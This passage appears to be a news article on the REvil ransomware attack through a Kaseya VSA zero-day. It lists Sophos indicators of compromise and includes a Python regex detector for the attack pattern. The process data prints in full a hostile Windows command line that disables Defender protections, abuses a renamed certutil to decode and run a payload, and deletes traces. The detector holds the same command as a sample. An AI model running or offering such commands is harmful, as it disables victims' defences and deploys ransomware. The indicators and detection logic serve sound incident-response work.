It was found that the zero-day vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure (DIVD), and Kaseya was validating the patch before rolling it out to customers.
In other words, the zero-day vulnerability used to breach on-premises Kaseya VSA servers was already in the process of being fixed when the REvil ransomware gang used it to perform a massive attack on Kaseya's customers.
As Kaseya VSA is primarily used by Managed Service Providers (MSPs), this approach gave the attackers privileged access to the devices of the MSPs' customers. A VSA server's functions include deploying software and automating IT tasks, so it is highly trusted on customer devices.
"After this crisis, there will be the question of who is to blame. From our side, we would like to mention Kaseya has been very cooperative. Once Kaseya was aware of our reported vulnerabilities, we have been in constant contact and cooperation with them. When items in our report were unclear, they asked the right questions," said Victor Gevers of DIVD.
Indicators of Compromise (courtesy of Sophos)
Sophos Detections
- Troj/Ransom-GIP
- Troj/Ransom-GIQ
- HPmal/Sodino-A
  - Detected in C:\Windows\MsMpEng.exe
- DynamicShellcode
  - hmpa.exploit.prevented.1
- Cryptoguard
  - cryptoguard.file.detected.1
Process Data:
- "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 6258 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
  - Parent Path: C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe
- "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
  - Parent Path: C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe
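As an added example (not part of the Sophos data or this article), the following Python detector checks process-creation events for the command-line pattern listed above: a loopback ping used as a sleep, Defender settings turned off via Set-MpPreference, certutil copied under a new name, and a .crt file decoded into an .exe. The event dictionary fields and the AgentMon parent id are constructed for the sample.

```python
import re

# Command-line patterns derived from the process data listed above.
INDICATORS = {
    "ping-loopback-sleep": re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d{3,}", re.I),
    "defender-tamper": re.compile(r"Set-MpPreference\b.*?-Disable\w+\s+\$true", re.I),
    "certutil-copied": re.compile(r"copy\s+/Y\s+\S*\\certutil\.exe\s+\S+", re.I),
    # "-decode" invoked by a binary whose name is not certutil.exe (renamed copy).
    "renamed-certutil-decode": re.compile(r"(?<!certutil)\.exe\s+-decode\b", re.I),
    "crt-decoded-to-exe": re.compile(r"-decode\s+\S+\.crt\s+\S+\.exe", re.I),
}
# Parent process observed in the Sophos data: the Kaseya agent monitor.
KASEYA_PARENT = re.compile(r"\\Kaseya\\[^\\]+\\AgentMon\.exe$", re.I)


def score_event(event):
    """Return the sorted names of all indicators matching one process event."""
    cmd = event.get("cmdline", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if KASEYA_PARENT.search(event.get("parent", "")):
        hits.append("kaseya-agentmon-parent")
    return sorted(hits)


def is_suspicious(event, threshold=2):
    """Flag an event when several indicators co-occur (single hits are noisy)."""
    return len(score_event(event)) >= threshold


# Constructed sample events (hypothetical id "EXAMPLEID" replaces the page's <ID>).
# The first reproduces the command line from the Sophos process data above.
SAMPLE_EVENTS = [
    {
        "parent": r"C:\Program Files (x86)\Kaseya\EXAMPLEID\AgentMon.exe",
        "cmdline": (
            r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 6258 > nul & '
            r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
            r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
            r'-DisableIOAVProtection $true -DisableScriptScanning $true '
            r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode '
            r'-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
            r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
            r'echo %RANDOM% >> C:\Windows\cert.exe & '
            r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
            r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'
        ),
    },
    # Benign: an administrator decoding a certificate with certutil under its own name.
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -decode C:\temp\server.b64 C:\temp\server.cer"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_suspicious(ev), score_event(ev))
```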
Files involved
- C:\windows\cert.exe (SHA-256: 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752)
- C:\windows\msmpeng.exe (SHA-256: 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a)
- C:\kworking\agent.crt
- C:\Windows\mpsvc.dll (SHA-256: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd)
- C:\kworking\agent.exe (SHA-256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e)
Registry Keys
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter
Ransomware Extension
- <victim ID>-readme.txt
Domains